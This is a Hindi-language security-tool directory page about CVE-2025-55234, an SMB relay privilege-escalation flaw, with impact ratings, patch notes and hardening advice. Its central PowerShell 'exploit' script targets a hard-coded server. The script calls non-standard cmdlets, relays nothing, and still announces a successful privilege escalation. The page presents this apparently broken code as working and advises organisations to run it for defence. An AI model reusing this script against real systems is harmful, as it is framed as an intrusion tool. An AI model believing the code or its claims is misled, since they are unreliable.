Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55234 — यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। यदि सफल होता है, तो यह प्रिविलेज एलिवेशन (EoP) का कारण बन सकता है, जो मूलतः अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुंच प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/mrk336/cve-2025-55234
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmrk336/cve-2025-55234

CVE-2025-55234

यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। यदि सफल होता है, तो यह प्रिविलेज एलिवेशन (EoP) का कारण बन सकता है, जो मूलतः अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुंच प्राप्त करने की अनुमति देता है।

रिपॉजिटरी देखें
1330 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55234

यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। अगर यह सफल होता है, तो यह विशेषाधिकार उन्नयन (Elevation of Privilege – EoP) का कारण बन सकता है, जिससे अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुँच प्राप्त हो सकती है।

मार्क मालिया द्वारा


समस्या

यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। सफल होने पर, यह विशेषाधिकार उन्नयन—अनिवार्य रूप से अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुँच प्राप्त करने की अनुमति—की ओर ले जा सकती है। SMB एंटरप्राइज़ वातावरणों में इसके व्यापक उपयोग और गंभीर कमज़ोरियों के इतिहास के कारण लंबे समय से हमलावरों के लिए एक लक्ष्य रहा है। उदाहरण के लिए, CVE-2020-1301 ने SMBv1 को गलत अनुरोधों के माध्यम से रिमोट कोड निष्पादन के लिए उजागर किया, जबकि CVE-2022-32230 ने SMBv3 में एक शून्य पॉइंटर डीरेफरेंस के माध्यम से सेवा अस्वीकार (denial-of-service) का कारण बना। कुख्यात CVE-2017-0144 (EternalBlue) ने वर्मेबल पेलोड देने के लिए SMBv1 का शोषण किया, जिससे वैश्विक रैनसमवेयर प्रकोप हुआ। इन पिछली भेद्यताओं की तरह, CVE-2025-55234 सत्र अपहरण और प्रतिरूपण हमलों को रोकने के लिए SMB साइनिंग और एक्सटेंडेड प्रोटेक्शन फॉर ऑथेंटिकेशन (EPA) को लागू करने के महत्व को रेखांकित करता है।

हमला वेक्टर

नेटवर्क

हमले की जटिलता

निम्न

आवश्यक विशेषाधिकार

कोई नहीं

उपयोगकर्ता सहभागिता

आवश्यक

प्रभाव

उच्च गोपनीयता, अखंडता और उपलब्धता जोखिम


यह क्यों महत्वपूर्ण है

SMB का उपयोग एंटरप्राइज़ वातावरणों में फ़ाइल साझाकरण और रिमोट एक्सेस के लिए व्यापक रूप से किया जाता है। रिले हमले प्रमाणीकरण तंत्रों को बायपास कर सकते हैं और उपयोगकर्ताओं का प्रतिरूपण कर सकते हैं। यह भेद्यता उन वातावरणों में विशेष रूप से खतरनाक है जहाँ SMB साइनिंग या एक्सटेंडेड प्रोटेक्शन फॉर ऑथेंटिकेशन (EPA) लागू नहीं है।


पैच में नया क्या है?

माइक्रोसॉफ्ट का सितंबर 2025 अपडेट संगठनों की मदद के लिए ऑडिट क्षमताएँ प्रस्तुत करता है:

  • उनके वर्तमान SMB कॉन्फ़िगरेशन का आकलन करना
  • ऐसे उपकरणों या सॉफ़्टवेयर की पहचान करना जो हार्डनिंग उपायों के साथ असंगत हो सकते हैं
  • SMB साइनिंग और EPA3 के प्रवर्तन की तैयारी करना

एक्सप्लॉइट कोड स्निपेट (PowerShell)

root@kitploit:~
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10"          # Target server IP
$attackerCreds = Get-Credential   # Credential object for relay

# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
    Write-Output "Found share: $($share.Name)"
}

# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
    Computer = $relayTarget
    Share    = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo

# Step 3: Execute relay attack
$attackPayload = {
    param(
        [string]$Target,
        [string]$Share
    )
    Write-Host "Attacking $Target via share $Share"
    Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
    Target = $relayTarget
    Share   = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams

# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."

स्पष्टीकरण:

  1. स्क्रिप्ट पहले लक्ष्य सर्वर पर SMB शेयरों को सूचीबद्ध करती है, रिले सत्र के लिए पहले शेयर का चयन करती है।
  2. फिर यह एक सत्र ऑब्जेक्ट बनाती है जो आवश्यक पैरामीटर्स को कैप्चर करता है।
  3. रिले हमला एक प्रमाणित उपयोगकर्ता का अनुकरण करने के लिए Invoke‑SMBRelay और Start‑SMBServer के माध्यम से निष्पादित किया जाता है।
  4. सफल समापन लक्ष्य पर उन्नत विशेषाधिकार प्रदान करता है।

अनुशंसित कार्रवाइयाँ

  1. SMB साइनिंग और EPA को सक्षम करें यदि पहले से कॉन्फ़िगर नहीं है।
  2. अपने वातावरण का मूल्यांकन करने के लिए नई ऑडिट घटनाओं का उपयोग करें।
  3. असामान्य SMB ट्रैफ़िक और रिले प्रयासों की निगरानी करें।
  4. माइक्रोसॉफ्ट से नवीनतम सुरक्षा अपडेट लागू करें।

निष्कर्ष

CVE-2025-55234 भेद्यता एंटरप्राइज़ सेटिंग्स में कठोर SMB हार्डनिंग की आवश्यकता को रेखांकित करती है। ऊपर दिए गए चरणों का पालन करके और प्रदान की गई एक्सप्लॉइट स्क्रिप्ट को लागू करके, संगठन अपने नेटवर्क का परीक्षण और संभावित रिले हमलों से सुरक्षा दोनों कर सकते हैं। यह प्रूफ-ऑफ-कॉन्सेप्ट और संबद्ध सामग्री केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रदान की जाती है। इसका उद्देश्य सुरक्षा पेशेवरों को नियंत्रित वातावरणों में CVE-2025-55234 को समझने, पहचानने और कम करने में मदद करना है। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग अवैध और अनैतिक है। हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और लागू कानूनों और संगठनात्मक नीतियों का अनुपालन करें।

टूल डाउनलोड करें